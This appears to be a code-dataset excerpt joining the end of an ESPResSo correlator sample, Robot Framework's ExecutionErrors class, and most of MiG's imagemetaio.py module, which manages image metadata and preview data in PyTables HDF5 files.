corr_operation="fcs_acf", args=[10, 10, 10], compress1="discard2")
# Ask the correlator for its parameters
print(c.get_params())
# Register the correlator for auto updating at the interval given by its
# dt (currently every timestep)
system.auto_update_accumulators.add(c)
system.auto_update_accumulators.add(fcs)
# Integrate
system.integrator.run(300000)
# Finalize the correlation calculation and write the results to a file
c.finalize()
np.savetxt("res.dat", c.result())
fcs.finalize()
np.savetxt("fcs.dat", fcs.result())
|
psci2195/espresso-ffans
|
samples/observables_correlators.py
|
Python
|
gpl-3.0
| 2,673
|
[
"ESPResSo"
] |
acce9531d9abd6ab8307951568170a88727d0b6d479828a8bc30f2bc58f8ad36
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robotide.lib.robot.model import ItemList
from robotide.lib.robot.utils import setter
from .message import Message
class ExecutionErrors(object):
"""Represents errors occurred during the execution of tests.
An error might be, for example, that importing a library has failed.
"""
message_class = Message
def __init__(self, messages=None):
#: A :class:`list-like object <robot.model.itemlist.ItemList>` of
#: :class:`~robot.model.message.Message` instances.
self.messages = messages
@setter
def messages(self, msgs):
return ItemList(self.message_class, items=msgs)
def add(self, other):
self.messages.extend(other.messages)
def visit(self, visitor):
visitor.visit_errors(self)
def __iter__(self):
return iter(self.messages)
def __len__(self):
return len(self.messages)
def __getitem__(self, index):
return self.messages[index]
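# Usage sketch (illustrative only, not part of the original module):
#
#   errors = ExecutionErrors()
#   errors.add(other_errors)   # merge messages from another ExecutionErrors
#   for message in errors:     # __iter__ yields Message instances
#       print(message)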
|
fingeronthebutton/RIDE
|
src/robotide/lib/robot/result/executionerrors.py
|
Python
|
apache-2.0
| 1,569
|
[
"VisIt"
] |
77bc59288f92f17f9481002dd15f1366df603e2139cb75c00903191be4b79441
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# imagemetaio - Managing MiG image meta data
# Copyright (C) 2003-2015 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
"""Image meta data helper functions"""
import os
from tables import open_file
import tables.exceptions
from numpy import dtype, float32, float64, uint8, uint16, uint32, \
uint64, int8, int16, int32, int64, empty
from shared.fileio import acquire_file_lock, release_file_lock
import traceback
__metapath = '.meta'
__settings_filepath = os.path.join(__metapath, 'settings.h5')
__image_metapath = os.path.join(__metapath, 'image')
__image_preview_path = os.path.join(__image_metapath, 'preview')
allowed_image_types = ['raw', 'tiff']
allowed_settings_status = {
'ready': 'Ready',
'pending': 'Pending',
'updating': 'Updating',
'failed': 'Failed',
}
allowed_data_types = {
'float32': float32,
'float64': float64,
'uint8': uint8,
'uint16': uint16,
'uint32': uint32,
'uint64': uint64,
'int8': int8,
'int16': int16,
'int32': int32,
'int64': int64,
}
image_file_settings_ent = dtype([
('extension', 'S16'),
('settings_status', 'S8'),
('settings_update_progress', 'S16'),
('settings_recursive', bool),
('image_type', 'S8'),
('data_type', 'S8'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('preview_image_extension', 'S16'),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
])
image_file_ent = dtype([
('extension', 'S16'),
('image_type', 'S8'),
('base_path', 'S4096'),
('path', 'S4096'),
('name', 'S4096'),
('data_type', 'S8'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('min_value', float64),
('max_value', float64),
('mean_value', float64),
('median_value', float64),
('file_md5sum', 'S4096'),
('preview_image_filepath', 'S4096'),
('preview_image_extension', 'S16'),
('preview_data_type', 'S8'),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
('preview_image_scale', float64),
])
image_volume_settings_ent = dtype([
('extension', 'S16'),
('settings_status', 'S8'),
('settings_update_progress', 'S16'),
('settings_recursive', bool),
('image_type', 'S8'),
('data_type', 'S8'),
('volume_filepattern', 'S64'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('zdim', uint64),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_zdim', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
])
image_volume_ent = dtype([
('image_type', 'S8'),
('base_path', 'S4096'),
('path', 'S4096'),
('name', 'S4096'),
('extension', 'S16'),
('volume_filepattern', 'S64'),
('data_type', 'S8'),
('offset', uint64),
('x_dimension', uint64),
('y_dimension', uint64),
('zdim', uint64),
('min_value', float64),
('max_value', float64),
('mean_value', float64),
('median_value', float64),
('file_md5sum', 'S4096'),
('preview_data_type', 'S8'),
('preview_x_dimension', uint64),
('preview_y_dimension', uint64),
('preview_zdim', uint64),
('preview_cutoff_min', float64),
('preview_cutoff_max', float64),
('preview_image_scale', float64),
])
preview_image_settings = {
'image_type': 'png',
'extension': 'png',
'x_dimension': 256,
'y_dimension': 256,
}
preview_volume_settings = {
'image_type': 'raw',
'extension': 'raw',
'x_dimension': 256,
'y_dimension': 256,
'zdim': 256,
}
def __ensure_filepath(logger, filepath, makedirs=False):
"""Ensure that meta file path exists"""
result = None
if makedirs:
try:
os.makedirs(filepath)
except Exception, ex:
if not os.path.exists(filepath):
logger.debug('__ensure_filepath: %s' % str(ex))
if os.path.exists(filepath):
result = filepath
return result
def __get_settings_filepath(logger, base_path, makedirs=False):
"""Returns settings filepath, created if non-existent"""
result = None
metapath = os.path.join(base_path, __metapath)
if __ensure_filepath(logger, metapath, makedirs) is not None:
result = os.path.join(base_path, __settings_filepath)
return result
def __get_image_metapath(logger, base_path, makedirs=False):
"""Returns image meta path, created if non-existent"""
result = None
if __ensure_filepath(logger, base_path, makedirs) is not None:
image_metapath = os.path.join(base_path, __image_metapath)
result = __ensure_filepath(logger, image_metapath, makedirs)
return result
def __ensure_tables_format(logger, metafile):
"""Ensure that pytables in metafile has the correct structure"""
tables = metafile['tables']
root = tables.root
if not tables.__contains__('/settings'):
settings_group = tables.create_group('/', 'settings',
'Directory Settings Entries')
else:
settings_group = root.settings
if not tables.__contains__('/settings/image_file_types'):
tables.create_table(settings_group, 'image_file_types',
image_file_settings_ent, 'Image File Types')
if not tables.__contains__('/settings/image_volume_types'):
tables.create_table(settings_group, 'image_volume_types',
image_volume_settings_ent,
'Image Volume Types')
if not tables.__contains__('/image'):
image_group = tables.create_group('/', 'image',
'Directory Image Entries')
else:
image_group = root.image
if not tables.__contains__('/image/files'):
image_files_group = tables.create_group(image_group, 'files',
'Image Files')
else:
image_files_group = root.image.files
if not tables.__contains__('/image/files/meta'):
tables.create_table(image_files_group, 'meta', image_file_ent,
'Image Files Metadata')
if not tables.__contains__('/image/files/preview'):
image_files_preview_group = \
tables.create_group(image_files_group, 'preview',
'Image File Previews')
else:
image_files_preview_group = root.image.files.preview
if not tables.__contains__('/image/files/preview/data'):
image_files_preview_data_group = \
tables.create_group(image_files_preview_group, 'data',
'Image File Preview Data')
else:
image_files_preview_data_group = root.image.files.preview.data
if not tables.__contains__('/image/files/preview/histogram'):
image_files_preview_histogram_group = \
tables.create_group(image_files_preview_group, 'histogram',
'Image File Preview Histograms')
if not tables.__contains__('/image/volumes'):
        image_volumes_group = tables.create_group(image_group, 'volumes',
                                                  'Image Volumes')
else:
image_volumes_group = root.image.volumes
if not tables.__contains__('/image/volumes/meta'):
tables.create_table(image_volumes_group, 'meta',
image_volume_ent, 'Image Volumes Metadata')
if not tables.__contains__('/image/volumes/preview'):
image_volumes_preview_group = \
tables.create_group(image_volumes_group, 'preview',
'Image Volume Previews')
else:
image_volumes_preview_group = root.image.volumes.preview
if not tables.__contains__('/image/volumes/preview/data'):
image_volumes_preview_data_group = \
tables.create_group(image_volumes_preview_group, 'data',
'Image Volume Preview Data')
else:
image_volumes_preview_data_group = \
root.image.volumes.preview.data
if not tables.__contains__('/image/volumes/preview/histogram'):
image_volumes_preview_histogram_group = \
            tables.create_group(image_volumes_preview_group, 'histogram',
                                'Image Volume Preview Histograms')
else:
image_volumes_preview_histogram_group = \
root.image.volumes.preview.histogram
return tables
def __clean_image_preview_path(logger, base_path):
"""Clean image preview path"""
result = True
abs_preview_path = os.path.join(base_path, __image_preview_path)
if os.path.exists(abs_preview_path):
for file_ent in os.listdir(abs_preview_path):
# TODO: Uncomment action below when sure paths are correct
# os.remove(file_ent)
            logger.info('imagemetaio.py: (dry run) Removing preview file: %s'
                        % file_ent)
return result
def __open_image_settings_file(logger, base_path, makedirs=False):
"""Opens image settings file with exclusive lock.
NOTE: Locks are not consistently enforced through fuse"""
logger.debug('base_path: %s' % base_path)
metafile = None
if __ensure_filepath(logger, base_path, makedirs) is not None:
image_settings_filepath = __get_settings_filepath(logger,
base_path, makedirs)
logger.debug('image_settings_filepath: %s'
% image_settings_filepath)
if image_settings_filepath is not None:
metafile = {}
metafile['lock'] = __acquire_file_lock(logger,
image_settings_filepath)
if image_settings_filepath is not None:
if os.path.exists(image_settings_filepath):
filemode = 'r+'
else:
filemode = 'w'
try:
metafile['tables'] = \
open_file(image_settings_filepath,
mode=filemode,
title='Image directory meta-data file'
)
__ensure_tables_format(logger, metafile)
except Exception, ex:
logger.error("opening: '%s' in mode '%s'"
% (image_settings_filepath, filemode))
logger.error(traceback.format_exc())
__close_image_settings_file(logger, metafile)
metafile = None
return metafile
def __close_image_settings_file(logger, metafile):
"""Closes image settings file releasing exclusive lock.
NOTE: Locks are not consistently enforced through fuse"""
result = True
if metafile is not None:
if metafile.has_key('tables'):
try:
metafile['tables'].close()
except Exception, ex:
logger.error(traceback.format_exc())
result = False
if metafile.has_key('lock'):
try:
__release_file_lock(logger, metafile)
except Exception, ex:
logger.error(traceback.format_exc())
result = False
return result
def __acquire_file_lock(logger, image_settings_filepath):
"""Obtain lock.
NOTE: Locks are not consistently enforced through fuse"""
lock_path = '%s.lock' % image_settings_filepath
logger.debug('lock_path: %s' % lock_path)
return acquire_file_lock(lock_path)
def __release_file_lock(logger, metafile):
"""Release lock.
NOTE: Locks are not consistently enforced through fuse"""
result = True
lock_handle = metafile['lock']
logger.debug('lock_path: %s' % lock_handle.name)
release_file_lock(lock_handle)
return result
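# Typical access pattern used throughout this module (a summary sketch):
#
#   metafile = __open_image_settings_file(logger, base_path)
#   if metafile is not None:
#       table = __get_image_file_meta_node(logger, metafile)
#       # ... read or modify rows ...
#       __close_image_settings_file(logger, metafile)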
def __get_image_file_settings_node(logger, metafile):
"""Returns image file settings node"""
return metafile['tables'].root.settings.image_file_types
def __get_image_file_meta_node(logger, metafile):
"""Returns image file meta node"""
return metafile['tables'].root.image.files.meta
def __get_image_file_data_node(logger, metafile):
"""Returns image file data node"""
return metafile['tables'].root.image.files.preview.data
def __get_image_file_histogram_node(logger, metafile):
"""Returns image file histogram node"""
return metafile['tables'].root.image.files.preview.histogram
def __add_image_file_ent(
logger,
table_row,
extension,
image_type,
settings_status=None,
settings_update_progress=None,
settings_recursive=None,
data_type=None,
base_path=None,
path=None,
name=None,
offset=0,
x_dimension=0,
y_dimension=0,
min_value=0,
max_value=0,
mean_value=0,
median_value=0,
file_md5sum=None,
preview_image_filepath=None,
preview_image_extension=None,
preview_data_type=None,
preview_x_dimension=0,
preview_y_dimension=0,
preview_cutoff_min=0,
preview_cutoff_max=0,
preview_image_scale=0,
update=False,
settings=False,
):
"""Add image setting or file entry"""
if not image_type in allowed_image_types:
logger.error("Image_type: '%s' not in allowed: %s'"
% (image_type, allowed_image_types))
return None
if settings and image_type == 'raw':
if offset is None and x_dimension is None and y_dimension \
is None and data_type is None:
msg = "settings for: '%s', image_type: '%s'" % (extension,
image_type)
msg = \
'%s missing offset, x_dimension, y_dimension and data_type' \
% msg
logger.warning(msg)
table_row['extension'] = extension
table_row['image_type'] = image_type
table_row['data_type'] = data_type
table_row['offset'] = offset
table_row['x_dimension'] = x_dimension
table_row['y_dimension'] = y_dimension
table_row['preview_image_extension'] = preview_image_extension
table_row['preview_x_dimension'] = preview_x_dimension
table_row['preview_y_dimension'] = preview_y_dimension
table_row['preview_cutoff_min'] = preview_cutoff_min
table_row['preview_cutoff_max'] = preview_cutoff_max
if settings == True:
table_row['settings_status'] = settings_status
table_row['settings_update_progress'] = settings_update_progress
table_row['settings_recursive'] = settings_recursive
else:
table_row['base_path'] = base_path
table_row['path'] = path
table_row['name'] = name
table_row['min_value'] = min_value
table_row['max_value'] = max_value
table_row['mean_value'] = mean_value
table_row['median_value'] = median_value
table_row['file_md5sum'] = file_md5sum
table_row['preview_image_filepath'] = preview_image_filepath
table_row['preview_data_type'] = preview_data_type
table_row['preview_image_scale'] = preview_image_scale
if update:
table_row.update()
else:
table_row.append()
logger.debug('added table_row: %s' % str(table_row))
return table_row
def __get_row_idx_list(logger, table, condition):
"""Get a list of row indexes from *table*, based
on *condition*, if condition is '' return all row indexes"""
logger.debug("condition: '%s'" % condition)
if condition is None or condition == '':
row_list = [i for i in xrange(table.nrows)]
else:
row_list = table.get_where_list(condition)
return row_list
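# Example (a sketch): a PyTables condition string selects matching rows, e.g.
#   __get_row_idx_list(logger, table, 'extension == b"tiff"')
# while the empty condition '' returns every row index.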
def __remove_row(
logger,
metafile,
table,
row_idx,
):
"""Remove row with index *row_idx* from *table*"""
result = None
nodepath = table._v_pathname
# If last row, delete and re-create table structure to get around:
# PyTables NotImplementedError: You are trying to delete all the rows in table
# This is not supported right now due to limitations on the underlying HDF5 library
if table.nrows > 1:
logger.debug('row_idx: %s' % row_idx)
table.remove_row(row_idx)
result = table
else:
logger.debug('rebuild settings_table')
table._f_remove(recursive=True, force=True)
__ensure_tables_format(logger, metafile)
result = metafile['tables'].get_node(nodepath)
return result
def __remove_image_files(
logger,
metafile,
base_path,
path=None,
name=None,
extension=None,
):
"""Remove image files, based on *path*, *name* and *extension*"""
status = False
removed = []
logger.debug('base_path: %s, path: %s, name: %s, extension: %s'
% (base_path, path, name, extension))
if metafile is not None:
image_file_table = __get_image_file_meta_node(logger, metafile)
condition = ''
if path is not None:
condition = '%s & (path == b"%s")' % (condition, path)
if name is not None:
condition = '%s & (name == b"%s")' % (condition, name)
if extension is not None:
condition = '%s & (extension == b"%s")' % (condition,
extension)
condition = condition.replace(' & ', '', 1)
row_list = __get_row_idx_list(logger, image_file_table,
condition)
logger.debug('Removing #%s row(s)' % len(row_list))
status = True
while status and len(row_list) > 0:
row_idx = row_list[0]
table_row = image_file_table[row_idx]
row_base_path = table_row['base_path']
row_path = table_row['path']
row_name = table_row['name']
row_preview_image_filepath = \
table_row['preview_image_filepath']
if __remove_image_file_preview(
logger,
metafile,
row_base_path,
row_path,
row_name,
row_preview_image_filepath,
):
                if row_path == '':
removed.append('%s/%s' % (row_base_path.strip('/'),
row_name.strip('/')))
else:
removed.append('%s/%s/%s' % (row_base_path.strip('/'
), row_path.strip('/'),
row_name.strip('/')))
image_file_table = __remove_row(logger, metafile,
image_file_table, row_idx)
row_list = __get_row_idx_list(logger, image_file_table,
condition)
else:
status = False
logger.debug('status: %s, removed: %s' % (str(status),
str(removed)))
return (status, removed)
def __remove_image_file_preview(
logger,
metafile,
base_path,
path,
name,
preview_image_filepath,
):
"""Remove image preview file, data and histogram"""
result = False
image_data_group = __get_image_file_data_node(logger, metafile)
image_histogram_group = __get_image_file_histogram_node(logger,
metafile)
image_filepath = os.path.join(path, name)
image_array_name = image_filepath.replace('/', '|')
# Remove preview image
abs_preview_image_filepath = os.path.join(base_path,
os.path.join(__image_preview_path, preview_image_filepath))
logger.debug('removing preview image: %s'
% abs_preview_image_filepath)
if os.path.exists(abs_preview_image_filepath):
os.remove(abs_preview_image_filepath)
# Remove preview data
if image_data_group.__contains__(image_array_name):
logger.debug('removing preview data: %s' % image_array_name)
image_data_group.__getattr__(image_array_name).remove()
else:
logger.debug('missing preview data: %s' % image_array_name)
# Remove histogram data
if image_histogram_group.__contains__(image_array_name):
logger.debug('removing preview histogram: %s'
% image_array_name)
image_histogram_group.__getattr__(image_array_name).remove()
else:
logger.debug('missing preview histogram: %s' % image_array_name)
result = True
return result
def __get_image_file_preview_data(
logger,
metafile,
path,
filename,
):
"""Returns handle to preview data table array"""
result = None
if metafile is not None:
data_group = __get_image_file_data_node(logger, metafile)
image_filepath = os.path.join(path, filename)
name = image_filepath.replace('/', '|')
try:
result = data_group.__getattr__(name)
logger.debug('type: %s, data_ent: %s, %s, %s'
% (type(result), result.dtype, result.shape,
result))
except tables.exceptions.NoSuchNodeError:
result = None
return result
def __get_image_file_preview_histogram_data(
logger,
metafile,
path,
filename,
):
"""Returns handle to preview histogram table array"""
result = None
if metafile is not None:
histogram_group = __get_image_file_histogram_node(logger,
metafile)
image_filepath = os.path.join(path, filename)
name = image_filepath.replace('/', '|')
try:
result = histogram_group.__getattr__(name)
logger.debug('type: %s, data_ent: %s, %s, %s'
% (type(result), result.dtype, result.shape,
result))
except tables.exceptions.NoSuchNodeError:
result = None
return result
def get_preview_image_url(logger, base_url, filepath):
"""Returns VGrid image url for generated preview image file"""
return '%s/%s/%s' % (base_url, __image_preview_path.strip('/'),
filepath)
def to_ndarray(logger, tables_array, out=None):
"""Converts table array to ndarray, this issues a copy"""
logger.debug('type: %s, dir: %s' % (type(tables_array),
dir(tables_array)))
if out is None:
result = empty(tables_array.shape, tables_array.dtype)
else:
result = out
result[:] = tables_array
return result
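# Example (a sketch):
#   arr = to_ndarray(logger, tables_array)     # fresh ndarray copy
#   to_ndarray(logger, tables_array, out=buf)  # fill a caller-provided buffer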
def add_image_file_setting(
logger,
base_path,
extension,
settings_status,
settings_update_progress,
settings_recursive,
image_type,
data_type=None,
offset=0,
x_dimension=0,
y_dimension=0,
preview_image_extension=None,
preview_x_dimension=0,
preview_y_dimension=0,
preview_cutoff_min=0,
preview_cutoff_max=0,
overwrite=False,
):
"""Add image file setting to metadata"""
result = False
metafile = __open_image_settings_file(logger, base_path,
makedirs=True)
if metafile is not None:
settings_table = __get_image_file_settings_node(logger,
metafile)
condition = 'extension == b"%s"' % extension
row_list = __get_row_idx_list(logger, settings_table, condition)
if not overwrite and len(row_list) > 0 or overwrite \
and len(row_list) > 1:
            logger.debug('Image settings for files with extension: "%s" already exist, #settings: %s'
% (extension, len(row_list)))
else:
if overwrite and len(row_list) == 1:
rows = settings_table.where(condition)
update = True
else:
rows = [settings_table.row]
update = False
result = True
for row in rows:
table_row = __add_image_file_ent(
logger,
row,
extension,
image_type,
settings_status=settings_status,
settings_update_progress=settings_update_progress,
settings_recursive=settings_recursive,
data_type=data_type,
offset=offset,
x_dimension=x_dimension,
y_dimension=y_dimension,
preview_image_extension=preview_image_extension,
preview_x_dimension=preview_x_dimension,
preview_y_dimension=preview_y_dimension,
preview_cutoff_min=preview_cutoff_min,
preview_cutoff_max=preview_cutoff_max,
update=update,
settings=True,
)
if table_row is None:
result = False
__close_image_settings_file(logger, metafile)
return result
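# Example call (a sketch; the argument values are illustrative):
#
#   add_image_file_setting(logger, base_path, 'tiff', 'Pending', '0 %', True,
#                          'tiff', preview_image_extension='png',
#                          preview_x_dimension=256, preview_y_dimension=256)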
def remove_image_file_setting(logger, base_path, extension):
"""Remove image file setting"""
return remove_image_file_settings(logger, base_path, extension)
def remove_image_file_settings(logger, base_path, extension=None):
"""Remove image file settings"""
logger.debug('base_path: %s, extension: %s' % (base_path,
extension))
status = False
removed = []
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
status = True
settings_table = __get_image_file_settings_node(logger,
metafile)
condition = ''
if extension is not None:
condition = 'extension == b"%s"' % extension
row_list = __get_row_idx_list(logger, settings_table, condition)
logger.debug('row_list: %s' % row_list)
while status and len(row_list) > 0:
logger.debug('row_list: %s' % row_list)
row_idx = row_list[0]
(status_files, _) = __remove_image_files(logger, metafile,
base_path, extension=extension)
if status_files:
logger.debug('settings_table.nrows: %s'
% settings_table.nrows)
removed.append(settings_table[row_idx]['extension'])
settings_table = __remove_row(logger, metafile,
settings_table, row_idx)
row_list = __get_row_idx_list(logger, settings_table,
condition)
else:
status = False
__close_image_settings_file(logger, metafile)
logger.debug('status: %s, removed: %s' % (str(status),
str(removed)))
return (status, removed)
def add_image_file(
logger,
base_path,
path,
name,
extension,
image_type,
data_type,
offset,
x_dimension,
y_dimension,
min_value,
max_value,
mean_value,
median_value,
file_md5sum,
preview_image_filepath,
preview_image_extension,
preview_data_type,
preview_x_dimension,
preview_y_dimension,
preview_cutoff_min,
preview_cutoff_max,
preview_image_scale,
overwrite=False,
):
"""Add image file entry to meta data"""
result = False
logger.debug('x_dimension: %s, y_dimension: %s, data_type: %s'
% (x_dimension, y_dimension, data_type))
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
image_file_table = __get_image_file_meta_node(logger, metafile)
condition = 'name == b"%s"' % name
row_list = __get_row_idx_list(logger, image_file_table,
condition)
if not overwrite and len(row_list) > 0 or overwrite \
and len(row_list) > 1:
logger.debug("'%s' for path: '%s' allready exists, #entries: %s"
% (name, base_path, len(row_list)))
else:
if overwrite and len(row_list) == 1:
rows = image_file_table.where(condition)
update = True
else:
rows = [image_file_table.row]
update = False
for row in rows:
__add_image_file_ent(
logger,
row,
extension,
image_type,
None,
None,
None,
data_type,
base_path,
path,
name,
offset,
x_dimension,
y_dimension,
min_value,
max_value,
mean_value,
median_value,
file_md5sum,
preview_image_filepath,
preview_image_extension,
preview_data_type,
preview_x_dimension,
preview_y_dimension,
preview_cutoff_min,
preview_cutoff_max,
preview_image_scale,
update=update,
settings=False,
)
result = True
__close_image_settings_file(logger, metafile)
return result
def remove_image_files(
logger,
base_path,
path=None,
name=None,
extension=None,
):
"""Remove image files"""
logger.debug('base_path: %s, path: %s, name: %s, extension: %s'
% (base_path, path, name, extension))
metafile = __open_image_settings_file(logger, base_path)
(result, removed) = __remove_image_files(
logger,
metafile,
base_path,
path,
name,
extension,
)
__close_image_settings_file(logger, metafile)
return (result, removed)
def get_image_file_setting(logger, base_path, extension):
"""Get image file setting"""
logger.debug('base_path: %s, extension: %s' % (base_path,
extension))
result = None
settings_result = get_image_file_settings(logger, base_path,
extension)
if settings_result is not None:
if len(settings_result) == 1:
result = settings_result[0]
elif len(settings_result) > 1:
            logger.warning('expected result of length 0 or 1, got: %s'
                           % len(settings_result))
return result
def update_image_file_setting(logger, base_path, setting):
"""Update image file setting"""
return add_image_file_setting(
logger,
base_path,
setting['extension'],
setting['settings_status'],
setting['settings_update_progress'],
setting['settings_recursive'],
setting['image_type'],
setting['data_type'],
setting['offset'],
setting['x_dimension'],
setting['y_dimension'],
setting['preview_image_extension'],
setting['preview_x_dimension'],
setting['preview_y_dimension'],
setting['preview_cutoff_min'],
setting['preview_cutoff_max'],
overwrite=True,
)
def get_image_file_settings(logger, base_path, extension=None):
"""Get image file settings"""
logger.debug('base_path: %s, extension: %s' % (base_path,
extension))
result = None
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
result = []
image_settings_table = __get_image_file_settings_node(logger,
metafile)
condition = ''
if extension is not None:
condition = 'extension == b"%s" ' % extension
row_list = __get_row_idx_list(logger, image_settings_table,
condition)
for row_idx in row_list:
entry = {}
entry['extension'] = \
image_settings_table[row_idx]['extension']
entry['settings_status'] = \
image_settings_table[row_idx]['settings_status']
entry['settings_update_progress'] = \
image_settings_table[row_idx]['settings_update_progress'
]
entry['settings_recursive'] = \
image_settings_table[row_idx]['settings_recursive']
entry['image_type'] = \
image_settings_table[row_idx]['image_type']
entry['data_type'] = \
image_settings_table[row_idx]['data_type']
entry['offset'] = image_settings_table[row_idx]['offset']
entry['x_dimension'] = \
image_settings_table[row_idx]['x_dimension']
entry['y_dimension'] = \
image_settings_table[row_idx]['y_dimension']
entry['preview_image_extension'] = \
image_settings_table[row_idx]['preview_image_extension']
entry['preview_x_dimension'] = \
image_settings_table[row_idx]['preview_x_dimension']
entry['preview_y_dimension'] = \
image_settings_table[row_idx]['preview_y_dimension']
entry['preview_cutoff_min'] = \
image_settings_table[row_idx]['preview_cutoff_min']
entry['preview_cutoff_max'] = \
image_settings_table[row_idx]['preview_cutoff_max']
result.append(entry)
__close_image_settings_file(logger, metafile)
return result
def get_image_file(
logger,
base_path,
path,
name,
):
"""Get image file"""
result = None
result_list = get_image_files(logger, base_path, path, name,
extension=None)
if result_list is not None:
if len(result_list) == 1:
result = result_list[0]
elif len(result_list) > 1:
            logger.warning('expected result of length 0 or 1, got: %s'
                           % len(result_list))
return result
def get_image_files(
logger,
base_path,
path=None,
name=None,
extension=None,
):
"""Get list of image file entries"""
result = None
logger.debug('base_path: %s, path: %s, name: %s, extension: %s'
% (base_path, path, name, extension))
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
image_file_table = __get_image_file_meta_node(logger, metafile)
condition = ''
if path is not None:
condition = '%s & (path == b"%s")' % (condition, path)
if name is not None:
condition = '%s & (name == b"%s")' % (condition, name)
if extension is not None:
condition = '%s & (extension == b"%s")' % (condition,
extension)
condition = condition.replace(' & ', '', 1)
row_list = __get_row_idx_list(logger, image_file_table,
condition)
logger.debug('#rows: %s' % len(row_list))
result = []
for row_idx in row_list:
entry = {}
entry['image_type'] = image_file_table[row_idx]['image_type'
]
entry['base_path'] = image_file_table[row_idx]['base_path']
entry['path'] = image_file_table[row_idx]['path']
entry['name'] = image_file_table[row_idx]['name']
entry['extension'] = image_file_table[row_idx]['extension']
entry['data_type'] = image_file_table[row_idx]['data_type']
entry['offset'] = image_file_table[row_idx]['offset']
entry['x_dimension'] = \
image_file_table[row_idx]['x_dimension']
entry['y_dimension'] = \
image_file_table[row_idx]['y_dimension']
entry['min_value'] = image_file_table[row_idx]['min_value']
entry['max_value'] = image_file_table[row_idx]['max_value']
entry['mean_value'] = image_file_table[row_idx]['mean_value'
]
entry['median_value'] = \
image_file_table[row_idx]['median_value']
entry['file_md5sum'] = \
image_file_table[row_idx]['file_md5sum']
entry['preview_image_filepath'] = \
image_file_table[row_idx]['preview_image_filepath']
entry['preview_image_extension'] = \
image_file_table[row_idx]['preview_image_extension']
entry['preview_cutoff_min'] = \
image_file_table[row_idx]['preview_cutoff_min']
entry['preview_cutoff_max'] = \
image_file_table[row_idx]['preview_cutoff_max']
entry['preview_data_type'] = \
image_file_table[row_idx]['preview_data_type']
entry['preview_x_dimension'] = \
image_file_table[row_idx]['preview_x_dimension']
entry['preview_y_dimension'] = \
image_file_table[row_idx]['preview_y_dimension']
entry['preview_image_scale'] = \
image_file_table[row_idx]['preview_image_scale']
entry['preview_data'] = to_ndarray(logger,
__get_image_file_preview_data(logger, metafile,
entry['path'], entry['name']))
entry['preview_histogram'] = to_ndarray(logger,
__get_image_file_preview_histogram_data(logger,
metafile, entry['path'], entry['name']))
result.append(entry)
__close_image_settings_file(logger, metafile)
return result
def get_image_file_count(logger, base_path, extension=None):
"""Returns number of files currently in metadata"""
result = 0
metafile = __open_image_settings_file(logger, base_path)
if metafile:
image_file_table = __get_image_file_meta_node(logger, metafile)
        condition = ''
        if extension is not None:
            condition = 'extension == b"%s"' % extension
row_list = __get_row_idx_list(logger, image_file_table,
condition)
result = len(row_list)
__close_image_settings_file(logger, metafile)
return result
def get_image_preview_path(
logger,
base_path,
path,
makedirs=False,
):
"""Returns image preview path, created if non-existent"""
logger.debug('base_path: %s, path: %s' % (base_path, path))
result = None
if __ensure_filepath(logger, base_path) is not None:
preview_path = os.path.join(__image_preview_path, path)
full_preview_path = os.path.join(base_path, preview_path)
if __ensure_filepath(logger, full_preview_path, makedirs) \
is not None:
result = preview_path
return result
def add_image_file_preview_data(
logger,
base_path,
path,
filename,
data,
):
"""Put *data* into a table array, created if non-existent"""
result = False
logger.debug('base_path: %s, path: %s, filename: %s, data: %s'
% (base_path, path, filename, data))
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
data_group = __get_image_file_data_node(logger, metafile)
image_filepath = os.path.join(path, filename)
title = 'Resized and rescaled data for: %s' % image_filepath
name = image_filepath.replace('/', '|')
        logger.debug('imagemetaio.py: add_image_file_preview_data -> name: %s'
                     % name)
        logger.debug('imagemetaio.py: add_image_file_preview_data -> title: %s'
                     % title)
        logger.debug('imagemetaio.py: add_image_file_preview_data -> data: %s, %s'
                     % (data.dtype, str(data.shape)))
try:
data_ent = data_group.__getattr__(name)
data_ent[:] = data
except tables.exceptions.NoSuchNodeError:
data_ent = metafile['tables'].create_array(data_group,
name, obj=data, title=title)
logger.debug('tables data: %s, %s' % (data_ent.dtype,
data_ent.shape))
result = True
__close_image_settings_file(logger, metafile)
return result
def get_image_file_preview_data(
logger,
base_path,
path,
filename,
):
"""Returns ndarray copy of preview file data"""
metafile = __open_image_settings_file(logger, base_path)
result = to_ndarray(logger, __get_image_file_preview_data(logger,
metafile, path, filename))
__close_image_settings_file(logger, metafile)
return result
def add_image_file_preview_histogram(
logger,
base_path,
path,
filename,
histogram,
):
"""Put *histogram* into a table array, created if non-existent"""
result = False
metafile = __open_image_settings_file(logger, base_path)
if metafile is not None:
histogram_group = __get_image_file_histogram_node(logger,
metafile)
